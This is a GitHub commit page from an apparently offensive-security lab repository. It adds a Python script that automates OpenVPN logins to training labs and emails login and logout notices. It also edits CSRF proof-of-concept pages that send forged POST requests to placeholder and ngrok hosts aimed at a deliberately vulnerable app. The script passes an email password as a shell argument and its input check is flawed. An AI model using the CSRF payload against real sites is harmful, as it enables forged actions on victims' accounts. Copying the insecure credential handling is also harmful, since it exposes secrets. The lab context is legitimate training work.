Skip to content

Commit e7cc907

Browse files
committed
lab vpn
1 parent 71addf9 commit e7cc907

6 files changed

Lines changed: 200 additions & 3 deletions

File tree

‎utility_scripts/lab_vpn/README.md‎

Lines changed: 36 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,36 @@
1+
## Description
2+
`lab-vpn.py` helps to automate the openvpn connection for the InfoSec labs (i.e. PWK / CTP / WAPTx / AWAE).
3+
4+
note: store your vpn and email password inside linux keyring.
5+
6+
### Usage
7+
```
8+
usage: lab_vpn.py [-h] -p -c -e -t [-d]
9+
10+
automate the openvpn lab connection
11+
12+
optional arguments:
13+
-h, --help show this help message and exit
14+
-c , --config provide a .json file
15+
16+
example:
17+
python lab_vpn.py -c asinha.json
18+
19+
20+
# set email creds into the keyring
21+
keyring set email username
22+
- provide the email_id
23+
keyring set email email_id
24+
- provide the password
25+
26+
# set offsec vpn creds into the keyring
27+
keyring set offsec_asinha username
28+
- provide the offsecID
29+
keyring set offsec_asinha offsecID
30+
- provide the password
31+
```
32+
33+
34+
35+
36+

‎utility_scripts/lab_vpn/lab_vpn.py‎

Lines changed: 147 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,147 @@
1+
#!/usr/bin/env python3
2+
3+
# author: greyshell
4+
# description: use openvpn to access offensive security labs
5+
6+
7+
import argparse
8+
import json
9+
import subprocess
10+
import sys
11+
import time
12+
import keyring
13+
import pexpect
14+
from colorama import Fore
15+
16+
# global constant variable
17+
PROGRAM_LOGO = """
18+
_ ____ _____ __ _______ __ _
19+
| |__ / () \ | () ) \ \/ /| ()_)| \| |
20+
|____|/__/\__\|_()_) \__/ |_| |_|\__|
21+
"""
22+
23+
24+
class UserInput:
25+
def __init__(self):
26+
self.parser = argparse.ArgumentParser(
27+
description="automate the openvpn lab connection")
28+
self.parser.add_argument("-c", "--config", metavar="", help="provide a .json file", required=True)
29+
30+
31+
class LoginVpn:
32+
def __init__(self):
33+
self._email_to = ""
34+
35+
self._email_from = ""
36+
self._email_password = ""
37+
self._login_message = ""
38+
self._logout_message = ""
39+
40+
self._vpn_user = ""
41+
self._vpn_password = ""
42+
self._dns = ""
43+
44+
self._vpn_config = ""
45+
self._vpn_command = ""
46+
47+
def get_parameters(self, config_dict):
48+
"""
49+
retrieve the value from the input
50+
:param config_dict: dict
51+
:return: None
52+
"""
53+
email_keyring_name = config_dict["email_keyring_name"]
54+
self._email_to = config_dict["email_to"]
55+
self._email_from = keyring.get_password(email_keyring_name, 'username')
56+
57+
self._email_password = keyring.get_password(email_keyring_name, self._email_from)
58+
self._login_message = config_dict["login_message_path"]
59+
self._logout_message = config_dict["logout_message_path"]
60+
61+
vpn_keyring_name = config_dict["vpn_keyring_name"]
62+
self._vpn_user = keyring.get_password(vpn_keyring_name, 'username')
63+
self._vpn_password = keyring.get_password(vpn_keyring_name, self._vpn_user)
64+
65+
self._dns = config_dict["dns"]
66+
67+
self._vpn_config = config_dict["ovpn_file_path"]
68+
69+
self._vpn_command = "openvpn" + " " + self._vpn_config
70+
71+
# validate the input
72+
if not self._vpn_user and self._vpn_password and self._vpn_config and self._email_to and self._email_from and \
73+
self._email_password and self._login_message and self._logout_message:
74+
print(f"[x] please fill the input in the json config file !!")
75+
sys.exit(0)
76+
77+
def lab_connection(self):
78+
"""
79+
connect to the vpn
80+
:return: None
81+
"""
82+
try:
83+
if self._dns:
84+
print(Fore.GREEN, f"[+] set the dns entry {self._dns} into /etc/resolve.conf")
85+
set_dns_command = "sed -i \'1s/^/nameserver " + self._dns + "\\n/\' /etc/resolv.conf"
86+
subprocess.check_output(set_dns_command, shell=True)
87+
88+
print(Fore.GREEN, f"[+] sending email notification to {self._email_to}")
89+
send_email_command = "sendEmail -f " + self._email_from + " -t " + self._email_to + \
90+
" -u \'logged-In\' -o message-file=" + self._login_message + \
91+
" -s smtp.gmail.com:587 -o tls=yes -xu " + self._email_from + \
92+
" -xp " + self._email_password
93+
94+
subprocess.check_output(send_email_command, shell=True)
95+
96+
print(Fore.LIGHTBLUE_EX, f"[*] connected to the lab, press ctrl+c to disconnect from the lab")
97+
98+
# connect to the lab
99+
i = pexpect.spawn(self._vpn_command)
100+
i.expect_exact("Enter")
101+
i.sendline(self._vpn_user)
102+
i.expect_exact("Password")
103+
i.sendline(self._vpn_password)
104+
105+
# delay for 1 day
106+
time.sleep(3600 * 24)
107+
108+
except KeyboardInterrupt:
109+
print(Fore.RED, f"[*] received ctrl+c, disconnecting from lab ")
110+
send_email_command = "sendEmail -f " + self._email_from + " -t " + self._email_to + \
111+
" -u \'logged-Out\' -o message-file=" + self._logout_message + \
112+
" -s smtp.gmail.com:587 -o tls=yes -xu " + self._email_from + \
113+
" -xp " + self._email_password
114+
subprocess.check_output(send_email_command, shell=True)
115+
print(Fore.GREEN, f"[*] sent email notification ")
116+
117+
if self._dns:
118+
print(Fore.GREEN, f"[+] unset the dns entry ")
119+
unset_dns_command = "sed -i '1d' /etc/resolv.conf"
120+
subprocess.check_output(unset_dns_command, shell=True)
121+
122+
except Exception as e:
123+
print(Fore.MAGENTA, f"[x] error occurs while connecting vpn !")
124+
print(e)
125+
126+
127+
if __name__ == "__main__":
128+
my_input = UserInput()
129+
args = my_input.parser.parse_args()
130+
131+
if len(sys.argv) == 1:
132+
my_input.parser.print_help(sys.stderr)
133+
sys.exit(0)
134+
135+
if args.config:
136+
with open(args.config) as f:
137+
json_config = json.load(f)
138+
139+
# display program logo
140+
print(Fore.GREEN, f"{PROGRAM_LOGO}")
141+
142+
conn = LoginVpn()
143+
conn.get_parameters(json_config)
144+
conn.lab_connection()
145+
146+
else:
147+
my_input.parser.print_help(sys.stderr)
Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
{
2+
"email_keyring_name": "",
3+
"email_to": "",
4+
"login_message_path": "",
5+
"logout_message_path": "",
6+
"ovpn_file_path": "",
7+
"dns": "",
8+
"vpn_keyring_name": ""
9+
}
10+

‎web/csrf/exploit_XmlHttpRequest.html‎

Lines changed: 4 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,10 @@
44
<script type="text/javascript">
55
// Vulnerable URL and POST parameters: http://0.tcp.ngrok.io:19944/update_age
66
var url = "http://black.com/update_age";
7-
var params = "age=50";
7+
//var url = "http://localhost:5000/update_age";
8+
//var url = "http://0.tcp.ngrok.io:15727/update_age";
9+
10+
var params = "age=5";
811

912
var CSRF = new XMLHttpRequest();
1013
CSRF.open("POST", url, true);

‎web/csrf/exploit_fetch.html‎

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -3,7 +3,8 @@
33
<body>
44
<script type="text/javascript">
55
// Vulnerable URL and POST parameters: http://0.tcp.ngrok.io:19944/update_age
6-
var url = "http://black.com/update_age";
6+
// var url = "http://black.com/update_age";
7+
var url = "http://0.tcp.ngrok.io:15727/update_age";
78
var params = "age=19";
89

910
// Example POST method implementation:

‎web/dblib/mysql_db.py‎

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,7 @@ def __init__(self):
1818
"""
1919
try:
2020
# pick database credentials from keyring
21-
self.conn = mysql.connector.connect(user=keyring.get_password('mysql', 'user'),
21+
self.conn = mysql.connector.connect(user=keyring.get_password('mysql', 'username'),
2222
password=keyring.get_password('mysql', 'password'),
2323
host='localhost',
2424
database='vulnapp')

0 commit comments

Comments
 (0)